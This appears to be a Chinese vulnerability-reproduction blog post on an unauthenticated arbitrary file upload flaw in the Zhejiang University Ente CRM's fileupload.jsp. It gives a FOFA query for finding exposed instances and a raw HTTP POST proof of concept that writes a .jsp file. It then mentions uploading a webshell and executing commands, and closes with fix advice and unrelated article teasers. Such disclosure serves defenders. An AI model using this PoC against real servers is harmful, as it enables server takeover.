浙大恩特客户资源管理系统任意文件上传漏洞复现
0x01 产品简介
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
0x02 漏洞概述
浙大恩特客户资源管理系统中fileupload.jsp接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
0x03 复现环境
FOFA:app="浙大恩特客户资源管理系统"
0x04 漏洞复现
PoC
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=1.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Encoding: gzip, deflate123
回显了上传路径
验证
上传马子
命令执行
0x05 修复建议
关闭互联网暴露面或设置接口访问权限
升级至安全版本
相关文章:
浙大恩特客户资源管理系统任意文件上传漏洞复现
0x01 产品简介 浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。 0x02 漏洞概述 浙大恩特客户资源管理系统中fileupload.jsp接口处存在文件上传漏洞,未经身份认…...
史上第一款AOSP开发的IDE (支持Java/Kotlin/C++/Jni/Native/Shell/Python)
ASFP Study 史上第一款AOSP开发的IDE (支持Java/Kotlin/C/Jni/Native/Shell/Python) 类似于Android Studio,可用于开发Android系统源码。 Android studio for platform,简称asfp(爱上富婆)。 背景&下载&使用 背景 由…...
GCC + Vscode 搭建 nRF52xxx 开发环境
在 Windows 下使用 GCC Vscode 搭建 nRF52xxx 开发环境 ...... by 矜辰所致前言 最近有遇到项目需求,需要使用到 Nordic 的 nRF52xxx 芯片,还记得当初刚开始写博文的时候的写的 nRF52832 学习笔记,现在看当时笔记毫无逻辑可言,…...
Linux应用开发基础知识——Framebuffer 应用编程(四)
前言: 在 Linux 系统中通过 Framebuffer 驱动程序来控制 LCD。Frame 是帧的意 思,buffer 是缓冲的意思,这意味着 Framebuffer 就是一块内存,里面保存着 一帧图像。Framebuffer 中保存着一帧图像的每一个像素颜色值,假设…...
智安网络|数据库入门秘籍:通俗易懂,轻松掌握与实践
在现代信息化时代,数据库已成为我们日常生活和工作中不可或缺的一部分。然而,对于非专业人士来说,数据库这个概念可能很抽象,难以理解。 一、什么是数据库? 简单来说,数据库是一个存储和管理数据的系统。它…...
EXCEL中安装多个vsto插件,插件之间互相影响功能,怎么解决
在 Excel 中安装多个 VSTO 插件,并且这些插件之间存在互相影响的情况下,可以采取以下措施来解决问题: 1. **隔离插件功能:** - 确保每个 VSTO 插件都有清晰的功能和责任范围,避免不同插件之间的功能重叠。这可以通…...
Java枚举
枚举类 概念 Java中的枚举(Enumeration)是一种特殊的数据类型,它是一种包含固定常量的类型。枚举是一种更加类型安全和更易维护的方式来定义常量,它包含了一组命名的值。 enum Weekday {MONDAY, TUESDAY, WEDNESDAY, THURSDAY,…...
基于MATLAB的关节型六轴机械臂轨迹规划仿真
笛卡尔空间下的轨迹规划,分为直线轨迹规划和圆弧轨迹规划,本文为笛卡尔空间下圆弧插值法的matlab仿真分析 目录 1 实验目的 2 实验内容 2.1标准D-H参数法 2.2实验中使用的Matlab函数 3 全部代码 4 仿真结果 1 实验目的 基于机器人学理论知识&…...
双11狂欢最后一天
大家好,本年度双11即将到来,为了答谢大家多年来的支持及更广泛的推广VBA的应用,“VBA语言専功”在此期间推出巨大优惠:此期间打包购买VBA技术资料实行半价优惠。 1:面向对象:学员及非学员 2:打…...
YOLOX: Exceeding YOLO Series in 2021(2021.8)
文章目录 AbstractIntroduction介绍前人的工作提出问题解决 YOLOXYOLOX-DarkNet53Implementation detailsYOLOv3 baselineDecoupled headStrong data augmentationAnchor-freeMulti positivesSimOTAEnd-to-end YOLOOther BackbonesModified CSPNet in YOLOv5Tiny and Nano dete…...
HBuilderX 运行Android App项目至雷电模拟器
一、下载安装HBuilderX HBuildeX官网 安装最新的正式版,或者点击历史版本查看更多版本;【ps:Alpha版本为开发版,功能更多,但是也不稳定,属于测试版本】 直接将压缩包解压,运行HBuildeX即可。 二…...
Java进阶(JVM调优)——阿里云的Arthas的使用 安装和使用 死锁查找案例,重新加载案例,慢调用分析
前言 JVM作为Java进阶的知识,是需要Java程序员不断深度和理解的。 本篇博客介绍JVM调优的工具阿里云的Arthas的使用,安装和使用,命令的使用案例;死锁查询的案例;重新加载一个类信息的案例;调用慢的分析案…...
续:将基于Nasm汇编的打字小游戏,移植到DOSBox
续:将基于Nasm汇编的打字小游戏,移植到DOSBox 文章目录 续:将基于Nasm汇编的打字小游戏,移植到DOSBox前情提要细说1 编译2 程序入口3 定位段 运行体验 前情提要 上一篇:【编程实践】黑框框里的打字小游戏,但…...
外部访问K8S集群内部的kafka集群服务
不许转载 kafka 部署 把 kafka 部署到 k8s 后,我们肯定是通过 service 从 k8s 外部访问 kafaka。这里的 service 要么是 NodePort, 要么是 LoadBalancer 类型。我们使用的方式是 LoadBalancer。 我们先看下面这张图,这是 kafka 在集群中的网…...
AttributeError: module ‘tensorflow‘ has no attribute ‘contrib‘解决办法
在TensorFlow2环境下执行1.X版本的代码时报错: AttributeError: module ‘tensorflow‘ has no attribute ‘contrib‘ 当然第一时间想到的是利用 如下代码 来解决问题(大部分情况都是这样), tf.compat.v1但是又出现以下报错 Att…...
物奇平台耳机恢复出厂设置功能实现
是否需要申请加入数字音频系统研究开发交流答疑群(课题组)?可加我微信hezkz17, 本群提供音频技术答疑服务,+群赠送语音信号处理降噪算法,蓝牙音频,DSP音频项目核心开发资料, 物奇平台耳机恢复出厂设置功能实现 一 需求 1 耳机接收到充电盒长按12S指令后触发, 2 接收到…...
RFID携手制造业升级,为锂电池生产带来前所未有的可靠性
应用背景 随着科技的发展和全球化的推进,产品的生产过程越来越复杂,且对品质的要求也越来越高。在锂电池生产领域,由于其高能量密度、长寿命和环保特性,已被广泛应用于电动汽车、储能系统等领域。然而,锂电池的安全性和…...
 三方工具使用)
【星海出品】flask (四) 三方工具使用
学习的灵魂是公社,学习的目标是人民自治.学习是非暴力革命方式的社会改革.学习是人民对抗资本剥夺的文明方式.学习失败了,就如同巴黎公社失败了一样.但是它为今后进行成功的社会改革指明了正确的方向.学习的逻辑并不复杂,一句话,必须让知识数量与知识价值基本吻合.管理学习也不…...
MongoDB 索引
类似关系型数据库,mongodb也建立自己的一套索引机制和查询优化方法。本文简单介绍mongodb的索引。后续文章讲详细介绍索引的操作,监控和查询优化方法等。 索引 索引,是一组按照特殊结构排列的,方便检索的数据。索引中保存了集合…...
[Hive] INSERT OVERWRITE DIRECTORY要注意的问题
在使用Hive的INSERT OVERWRITE语句时,需要注意以下问题: 数据覆盖:INSERT OVERWRITE语句会覆盖目标目录中的数据。因此,在执行该语句之前,请确保目标目录为空或者你希望覆盖的数据已经不再需要。数据格式:…...
英雄联盟智能助手:League Akari 的终极自动化工具集指南
英雄联盟智能助手:League Akari 的终极自动化工具集指南 【免费下载链接】League-Toolkit An all-in-one toolkit for LeagueClient. Gathering power 🚀. 项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit 你是否厌倦了每次游戏前繁…...
DenseNet凭什么拿CVPR最佳论文?深入剖析‘特征重用’与‘密集连接’的设计哲学
DenseNet革命:特征重用的神经网络设计范式突破 从ResNet到DenseNet的进化之路 2017年CVPR最佳论文奖授予了《Densely Connected Convolutional Networks》(DenseNet),这一荣誉绝非偶然。在深度学习领域,网络架构的创新…...
Skate:让编码智能体访问看板
当你和AI结对编程太长时间后,会有这样一种情况。你全身心投入其中——Claude在疯狂输出代码,你在审查、批准、纠正方向——几个小时后你突然意识到:没有人记录下刚才发生了什么。 没有工单被更新。没有计时器在运行。聊天记录长到看不到头&a…...
为什么 AI 生图又回到了聊天入口:ChatGPT Images 2 之后,普通人的工作流怎么变
这轮 AI 生图的变化,如果只盯着“效果是不是更好了”,其实很容易把重点看窄。对多数普通用户来说,真正影响使用习惯的地方,不是单张图的观感,而是聊天入口重新开始接住前后的连续动作。ChatGPT Images 2.0 这类更新放出…...
Windows实时语音转文字终极指南:TMSpeech离线字幕解决方案完整解析
Windows实时语音转文字终极指南:TMSpeech离线字幕解决方案完整解析 【免费下载链接】TMSpeech 腾讯会议摸鱼工具 项目地址: https://gitcode.com/gh_mirrors/tm/TMSpeech 还在为会议记录效率低下而烦恼吗?想要一款完全离线的实时语音转文字工具吗…...
TTS-Vue离线语音合成终极配置方案:从零搭建到高效应用
TTS-Vue离线语音合成终极配置方案:从零搭建到高效应用 【免费下载链接】tts-vue 🎤 微软语音合成工具,使用 Electron Vue ElementPlus Vite 构建。 项目地址: https://gitcode.com/gh_mirrors/tt/tts-vue TTS-Vue是一款基于微软语音…...
2025_NIPS_CALM: Culturally Self-Aware Language Models
文章核心总结与翻译 一、主要内容 本文提出CALM(Culturally Self-Aware Language Models)框架,旨在为语言模型赋予文化自我意识,解决现有模型将文化视为静态知识、缺乏动态适应性的问题。CALM通过四个核心模块实现文化感知:抽象认知空间分离任务语义与显式/隐式文化特征…...
Windows 11/10 空间音效二选一:免费 Sonic 还是付费 Dolby Atmos?实测对比帮你避坑
Windows空间音效实战指南:Sonic与Dolby Atmos的深度对比与场景化选择 刚入手一副千元级游戏耳机的张伟,在Windows 11的声音设置里发现了两个陌生的选项——Windows Sonic和Dolby Atmos。这位《赛博朋克2077》的忠实玩家很快发现,不同的音效设…...
海明码和异或运算
一、海明码二、异或运算...
9 款 AI 写论文哪个好?2026 深度实测:虎贲等考 AI 凭真文献 + 实图表稳居毕业论文首选
每到毕业季,“9 款 AI 写论文哪个好” 就成了本硕生必问话题。市面上 AI 论文工具虽多,但能做到文献真实可溯源、图表数据可验证、全流程适配毕业论文、低重复低 AI 痕迹的工具寥寥无几。多数通用 AI 存在文献虚构、内容空洞、无实证能力、格式不规范等硬…...